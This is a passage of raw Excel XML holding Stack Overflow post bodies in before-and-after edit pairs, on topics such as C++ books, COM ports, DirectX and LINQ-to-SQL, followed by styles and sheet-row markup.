 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;h2&gt;&lt;span class="diff-add"&gt;Classics / Older&lt;/span&gt;&lt;/h2&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Note:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; Some information contained within these books may not be up-to-date or no longer considered best practice.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201543303" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;The Design and Evolution of C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Bjarne Stroustrup) If you want to know &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;why&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; the language is the way it is, this book is where you find answers. This covers everything &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;before the standardization&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; of C++.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201423391" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Ruminations on C++&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; - (Andrew Koenig and Barbara Moo) &lt;/span&gt;&lt;a href="http://accu.org/index.php?module=bookreviews&amp;amp;func=search&amp;amp;rid=776" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;[Review]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201548550" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Advanced C++ Programming Styles and Idioms&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (James Coplien) A predecessor of the pattern movement, it describes many C++-specific "idioms". It's certainly a very good book and still worth a read if you can spare the time, but quite old and not up-to-date with current C++.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201633620" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Large Scale C++ Software Design&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (John Lakos) Lakos explains techniques to manage very big C++ software projects. Certainly a good read, if it only was up to date. It was written long before C++98, and misses on many features (e.g. namespaces) important for large scale projects. If you need to work in a big C++ software project, you might want to read it, although you need to take more than a grain of salt with it. There's been the rumor that Lakos is writing an up-to-date edition of the book for years.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201834545" rel="nofollow noreferrer"&gt;&lt;em&gt;&lt;span class="diff-add"&gt;Inside the C++ Object Model&lt;/span&gt;&lt;/em&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; (Stanley Lippman) If you want to know how virtual member functions are commonly implemented and how base objects are commonly laid out in memory in a multi-inheritance scenario, and how all this affects performance, this is where you will find thorough discussions of such topics.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; This question has historical significance, but is not a good example of an appropriate question. Read and learn from this post, but please do not use it as evidence that you can ask similar questions.&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; See the &lt;/span&gt;&lt;a href="http://stackoverflow.com/faq"&gt;&lt;span class="diff-add"&gt;FAQ&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; for more information.&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I asked this question:&lt;br&gt; &lt;a href="http://stackoverflow.com/questions/434494/serial-port-rs232-in-mono-for-multiple-platforms"&gt;Serial Port (rs232) in Mono for multiple platforms&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; and this one is related:&lt;br&gt; &lt;a href="http://stackoverflow.com/questions/304986/how-do-i-get-the-friendly-name-of-a-com-port-in-windows"&gt;How do I get the friendly name of a COM port in Windows?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; But I want to be able to get the "friendly" name on Windows- and possibly also on linux /mac if there is such a thing.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there any cross platform way to do it, or am I out of luck?&lt;/p&gt; _x000D_
 &lt;p&gt; Here is what I am doing in my current app - and it works great for native C++ win32.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.naughter.com/enumser.html" rel="nofollow noreferrer"&gt;http://www.naughter.com/enumser.html&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; In any case it does not look like a pretty solution for cross-platform distribution. Does anyone have any suggestions?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I asked this question:&lt;br&gt; &lt;a href="http://stackoverflow.com/questions/434494/serial-port-rs232-in-mono-for-multiple-platforms"&gt;Serial Port (rs232) in Mono for multiple platforms&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; and this one is related:&lt;br&gt; &lt;a href="http://stackoverflow.com/questions/304986/how-do-i-get-the-friendly-name-of-a-com-port-in-windows"&gt;How do I get the friendly name of a COM port in Windows?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; But I want to be able to get the "friendly" name on Windows- and possibly also on linux /mac if there is such a thing.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there any cross platform way to do it, or am I out of luck?&lt;/p&gt; _x000D_
 &lt;p&gt; Here is what I am doing in my current app - and it works great for native C++ win32.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.naughter.com/enumser.html" rel="nofollow noreferrer"&gt;http://www.naughter.com/enumser.html&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; In any case it does not look like a pretty solution for cross-platform distribution. Does anyone have any suggestions?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT - since people are having trouble understanding what I am asking for: as an example - COM9 is not a friendly name. I want something that says "COM9 - USB connector" or something like that. This is possible with the link above in Win32. It is nasty and hacky, but many times end users have no idea what COM port they need to open in my program unless there is a useful name - more useful than "COMn."&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been working on a DirectX application in C#, and I noticed that when I lock the workstation, the DirectX "Device" becomes lost. After looking up the information about what to do upon when a device is lost (and when a DeviceLostException is thrown by Device.Present), I re-wrote the code reset the Device. This simply meant that I made a call to Device.Reset.&lt;/p&gt; _x000D_
 &lt;p&gt; Calling Device.Reset recovered the Device. No problem. But when I lost the device a second time (for example, when the computer was locked, went to sleep, or activated a screen-saver), an exception was thrown by Device.Reset.&lt;/p&gt; _x000D_
 &lt;p&gt; The exception was InvalidCallException, which (according to the documentation) means something went wrong with the call. So I assumed it was a problem with the arguments to the function. So instead of passing the same copy of &lt;code&gt;&lt;span class="diff-delete"&gt;PresentParams&lt;/span&gt;&lt;/code&gt; that I used to create the Device, I created a new instance of PresentParams (at first using the copy constructor, and later by re-creating without it) and passed that to Device.Reset.&lt;/p&gt; _x000D_
 &lt;p&gt; Doesn't work. Device.Reset still dies with the InvalidCallException. Oh, and the message of the exception? "Error in application." Not helpful.&lt;/p&gt; _x000D_
 &lt;p&gt; Can you point me in the direction of either a solution, or some documentation about how to get more debug information out of DirectX?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been working on a DirectX application in C#, and I noticed that when I lock the workstation, the DirectX "Device" becomes lost. After looking up the information about what to do upon when a device is lost (and when a DeviceLostException is thrown by Device.Present), I re-wrote the code reset the Device. This simply meant that I made a call to Device.Reset.&lt;/p&gt; _x000D_
 &lt;p&gt; Calling Device.Reset recovered the Device. No problem. But when I lost the device a second time (for example, when the computer was locked, went to sleep, or activated a screen-saver), an exception was thrown by Device.Reset.&lt;/p&gt; _x000D_
 &lt;p&gt; The exception was InvalidCallException, which (according to the documentation) means something went wrong with the call. So I assumed it was a problem with the arguments to the function. So instead of passing the same copy of &lt;span class="diff-add"&gt;PresentParams&lt;/span&gt; that I used to create the Device, I created a new instance of PresentParams (at first using the copy constructor, and later by re-creating without it) and passed that to Device.Reset.&lt;/p&gt; _x000D_
 &lt;p&gt; Doesn't work. Device.Reset still dies with the InvalidCallException. Oh, and the message of the exception? "Error in application." Not helpful.&lt;/p&gt; _x000D_
 &lt;p&gt; Can you point me in the direction of either a solution, or some documentation about how to get more debug information out of DirectX?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Shalom Craimer</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;DUPLICATE&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/7074/in-c-what-is-the-difference-between-string-and-string"&gt;&lt;span class="diff-delete"&gt;What is the difference between String and string in C#?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Newbie here, in C# what is the difference between the upper and lower case String/string?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Newbie here, in C# what is the difference between the upper and lower case String/string?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ZombieSheep</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have multiple tables with an "id" component. I'd like to use LINQ to get an item from one of these tables with the correct LINQ-To-SQL type, but only using one CompiledQuery.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's an example that works currently. Say the object type defined in the DBML is "myitem" and its table is "myitems".&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    var getOneItem = CompiledQuery.Compile(_x000D_
        (MyDataContext db, long id) =&amp;gt; ((from i in db.myitems_x000D_
                                              where i.id == id_x000D_
                                              select i).SingleOrDefault()));_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I'd like to make this, where the type can be "myitem", "myitems2", or whatever table and object type I might be interested in.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    var getOneItemAnyTable = CompiledQuery.Compile(_x000D_
        (Table tab, Type T long id) =&amp;gt; ((from anItem in tab&amp;lt;T&amp;gt;_x000D_
                                              where anItem.id == id_x000D_
                                              select anItem).SingleOrDefault()));_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I made up this syntax because I'm not sure what the syntax should look like here. Any ideas if it's possible? Would I have to munge the DBML to make some kind of superclass for the types involved?&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;(**edit: &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/439086/get-entity-from-table-using-reflection-from-abstract-type"&gt;&lt;span class="diff-delete"&gt;duplicate&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;?)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have multiple tables with an "id" component. I'd like to use LINQ to get an item from one of these tables with the correct LINQ-To-SQL type, but only using one CompiledQuery.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's an example that works currently. Say the object type defined in the DBML is "myitem" and its table is "myitems".&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    var getOneItem = CompiledQuery.Compile(_x000D_
        (MyDataContext db, long id) =&amp;gt; ((from i in db.myitems_x000D_
                                              where i.id == id_x000D_
                                              select i).SingleOrDefault()));_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I'd like to make this, where the type can be "myitem", "myitems2", or whatever table and object type I might be interested in.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;    var getOneItemAnyTable = CompiledQuery.Compile(_x000D_
        (Table tab, Type T long id) =&amp;gt; ((from anItem in tab&amp;lt;T&amp;gt;_x000D_
                                              where anItem.id == id_x000D_
                                              select anItem).SingleOrDefault()));_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I made up this syntax because I'm not sure what the syntax should look like here. Any ideas if it's possible? Would I have to munge the DBML to make some kind of superclass for the types involved?&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Marc Gravell</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The company I work at is run on Excel sheets. Several of those sheets have some form of VBA code embedded. &lt;span class="diff-delete"&gt;I am&lt;/span&gt; doing some maintenance on them, but it feels really dated.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;What is going to&lt;/span&gt; happen to Office VBA?&lt;/p&gt; _x000D_
 &lt;p&gt; Why &lt;span class="diff-delete"&gt;has not&lt;/span&gt; Microsoft released an embedded &lt;code&gt;&lt;span class="diff-delete"&gt;.NET&lt;/span&gt;&lt;/code&gt; macro language for Office?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The company I work at is run on Excel sheets. Several of those sheets have some form of VBA code embedded. &lt;span class="diff-add"&gt;I'm&lt;/span&gt; doing some maintenance on them, but it feels really dated.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;What's gonna&lt;/span&gt; happen to Office VBA?&lt;/p&gt; _x000D_
 &lt;p&gt; Why &lt;span class="diff-add"&gt;hasn't&lt;/span&gt; Microsoft released an embedded &lt;span class="diff-add"&gt;.NET&lt;/span&gt; macro language for Office?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>DotNetDeveloper</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the class hierarchy that is most necessary to get a excellent grasp of, for the aspiring C# desktop applications programmer? Not just the totally obvious stuff.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: To clarify, I mean, that as I am learning C#, I would like to know what are the classes I should be acquainting myself with, that aren't necessarily going to be obvious to someone who isn't experienced enough to know what is, and is not important to learn.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the class hierarchy that is most necessary to get a excellent grasp of, for the aspiring C# desktop applications programmer? Not just the totally obvious stuff.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: To clarify, I mean, that as I am learning C#, I would like to know what are the classes I should be acquainting myself with, that aren't necessarily going to be obvious to someone who isn't experienced enough to know what is, and is not important to learn.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT2: Are there any more obscure classes? So far I know a good deal about many of these already given.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alex Baranosky</t>
  </si>
  <si>
    <t>Krzysztof Kozmic</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What do the following mean in an sql sytax:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt;(+) after a condition eg: &lt;span class="diff-delete"&gt;WHERE&lt;/span&gt; table1.col1 = table2.col2 (+)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; What does /* */ after select signify , i vaguely remember it being a suggestion to the optimizer, but where can i find more reference on this eg: select /* */ ...&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What do the following mean in an sql sytax:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt;(+) after a condition eg: &lt;span class="diff-add"&gt;"WHERE&lt;/span&gt; table1.col1 = table2.col2 (+)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; What does /* */ after select signify , i vaguely remember it being a suggestion to the optimizer, but where can i find more reference on this eg: select /* */ ...&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>UnkwnTech</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What major features are missing from Linq-to-Sql?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Compatibility with other major SQL Database Engines (MySQL etc)&lt;/li&gt; _x000D_
  &lt;li&gt; Mapping Many-to-Many relationships&lt;/li&gt; _x000D_
  &lt;li&gt; Any others?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I have already developed a major project with Linq-to-Sql at it's DAL Heart. i hadn't developed using a relational data mapper before, so it was a learning curve coming from datasets. But i didn't find any major problems which couldn't be solved with Linq-to-Sql. My testing concluded that it was significantly faster than Linq-to-Entities.&lt;/p&gt; _x000D_
 &lt;p&gt; So what major features are missing from Linq-to-Sql?&lt;/p&gt; _x000D_
 &lt;p&gt; I guess what i am trying to ask is if development on Linq-to-Sql is ceased - will it matter?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What major features are missing from Linq-to-Sql?&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Compatibility with other major SQL Database Engines (MySQL etc)&lt;/li&gt; _x000D_
  &lt;li&gt; Mapping Many-to-Many relationships&lt;/li&gt; _x000D_
  &lt;li&gt; Any others?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I have already developed a major project with Linq-to-Sql at it's DAL Heart. i hadn't developed using a relational data mapper before, so it was a learning curve coming from datasets. But i didn't find any major problems which couldn't be solved with Linq-to-Sql. My testing concluded that it was significantly faster than Linq-to-Entities.&lt;/p&gt; _x000D_
 &lt;p&gt; So what major features are missing from Linq-to-Sql?&lt;/p&gt; _x000D_
 &lt;p&gt; I guess what i am trying to ask is if development on Linq-to-Sql is ceased - will it matter?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Duplicate Questions&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/253263/has-microsoft-really-killed-linq-to-sql"&gt;&lt;span class="diff-add"&gt;http://stackoverflow.com/questions/253263/has-microsoft-really-killed-linq-to-sql&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; and &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/252683/is-linq-to-sql-doa"&gt;&lt;span class="diff-add"&gt;Is LINQ to SQL Dead or Alive?&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; and &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/352487/is-linq2sql-dead"&gt;&lt;span class="diff-add"&gt;http://stackoverflow.com/questions/352487/is-linq2sql-dead&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Harry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</si>
</sst>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rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFF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20" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="11" fontId="19" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="23" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="20" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="22" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="11" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="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765"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="110" zoomScaleNormal="110" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A739" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="F1" sqref="F1"/>
      <selection pane="bottomLeft" activeCell="F768" sqref="F768"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.109375" defaultRowHeight="15.6" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="15.33203125" style="9" customWidth="1"/>
    <col min="2" max="2" width="39.44140625" style="9" customWidth="1"/>
    <col min="3" max="3" width="14.109375" style="9" customWidth="1"/>
    <col min="4" max="6" width="9.109375" style="9" customWidth="1"/>
    <col min="7" max="7" width="21.33203125" style="9" customWidth="1"/>
    <col min="8" max="8" width="10.5546875" style="9" customWidth="1"/>
    <col min="9" max="9" width="9.109375" style="9" customWidth="1"/>
    <col min="10" max="10" width="17.88671875" style="9" customWidth="1"/>
    <col min="11" max="11" width="53.5546875" style="9" customWidth="1"/>
    <col min="12" max="13" width="14.109375" style="14" customWidth="1"/>
    <col min="14" max="14" width="25.88671875" style="9" customWidth="1"/>
    <col min="15" max="15" width="26.44140625" style="9" customWidth="1"/>
    <col min="16" max="16" width="23.6640625" style="9" customWidth="1"/>
    <col min="17" max="17" width="24.109375" style="9" customWidth="1"/>
    <col min="18" max="16384" width="9.109375" style="9"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" s="11" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="11" t="s">
        <v>1592</v>
      </c>
      <c r="D1" s="11" t="s">
        <v>1593</v>
      </c>
      <c r="E1" s="11" t="s">
        <v>1594</v>
      </c>
      <c r="F1" s="11" t="s">
        <v>1595</v>
      </c>
      <c r="G1" s="11" t="s">
        <v>1596</v>
      </c>
      <c r="H1" s="11" t="s">
        <v>1597</v>
      </c>
      <c r="I1" s="11" t="s">
        <v>1598</v>
      </c>
      <c r="J1" s="11" t="s">
        <v>1599</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="L1" s="2" t="s">
        <v>692</v>
      </c>
      <c r="M1" s="2" t="s">
        <v>822</v>
      </c>
      <c r="N1" s="1" t="s">
        <v>693</v>
      </c>
      <c r="O1" s="1" t="s">
        <v>694</v>
      </c>
      <c r="P1" s="1" t="s">
        <v>695</v>
      </c>
      <c r="Q1" s="1" t="s">
        <v>713</v>
      </c>
    </row>
    <row r="2" spans="1:17" s="11" customFormat="1" ht="16.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2" s="9">
        <v>4</v>
      </c>
      <c r="B2" s="9" t="s">
        <v>825</v>
      </c>
      <c r="C2" s="9" t="s">
        <v>1600</v>
      </c>
      <c r="D2" s="9" t="s">
        <v>1601</v>
      </c>
      <c r="E2" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F2" s="9" t="s">
        <v>1603</v>
      </c>
      <c r="G2" s="10">
        <v>42293.029166666667</v>
      </c>
      <c r="H2" s="9">
        <v>1859369</v>
      </c>
      <c r="I2" s="9" t="s">
        <v>1604</v>
      </c>
      <c r="J2" s="10">
        <v>42290.435416666667</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>826</v>
      </c>
      <c r="L2" s="7">
        <v>23</v>
      </c>
      <c r="M2" s="7">
        <v>21</v>
      </c>
      <c r="N2" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O2" s="9"/>
      <c r="P2" s="9"/>
      <c r="Q2" s="9"/>
    </row>
    <row r="3" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A3" s="9">
        <v>9</v>
      </c>
      <c r="B3" s="9" t="s">
        <v>827</v>
      </c>
      <c r="C3" s="9" t="s">
        <v>1605</v>
      </c>
      <c r="D3" s="9" t="s">
        <v>1606</v>
      </c>
      <c r="E3" s="9">
        <v>212</v>
      </c>
      <c r="F3" s="9" t="s">
        <v>1607</v>
      </c>
      <c r="G3" s="10">
        <v>41583.574999999997</v>
      </c>
      <c r="H3" s="9">
        <v>2455399</v>
      </c>
      <c r="I3" s="9" t="s">
        <v>1608</v>
      </c>
      <c r="J3" s="10">
        <v>41583.482638888891</v>
      </c>
      <c r="K3" s="9" t="s">
        <v>828</v>
      </c>
      <c r="L3" s="7">
        <v>26</v>
      </c>
      <c r="M3" s="7">
        <v>20</v>
      </c>
      <c r="N3" s="9" t="s">
        <v>700</v>
      </c>
      <c r="O3" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="4" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A4" s="9">
        <v>11</v>
      </c>
      <c r="B4" s="9" t="s">
        <v>829</v>
      </c>
      <c r="C4" s="9" t="s">
        <v>1609</v>
      </c>
      <c r="D4" s="9" t="s">
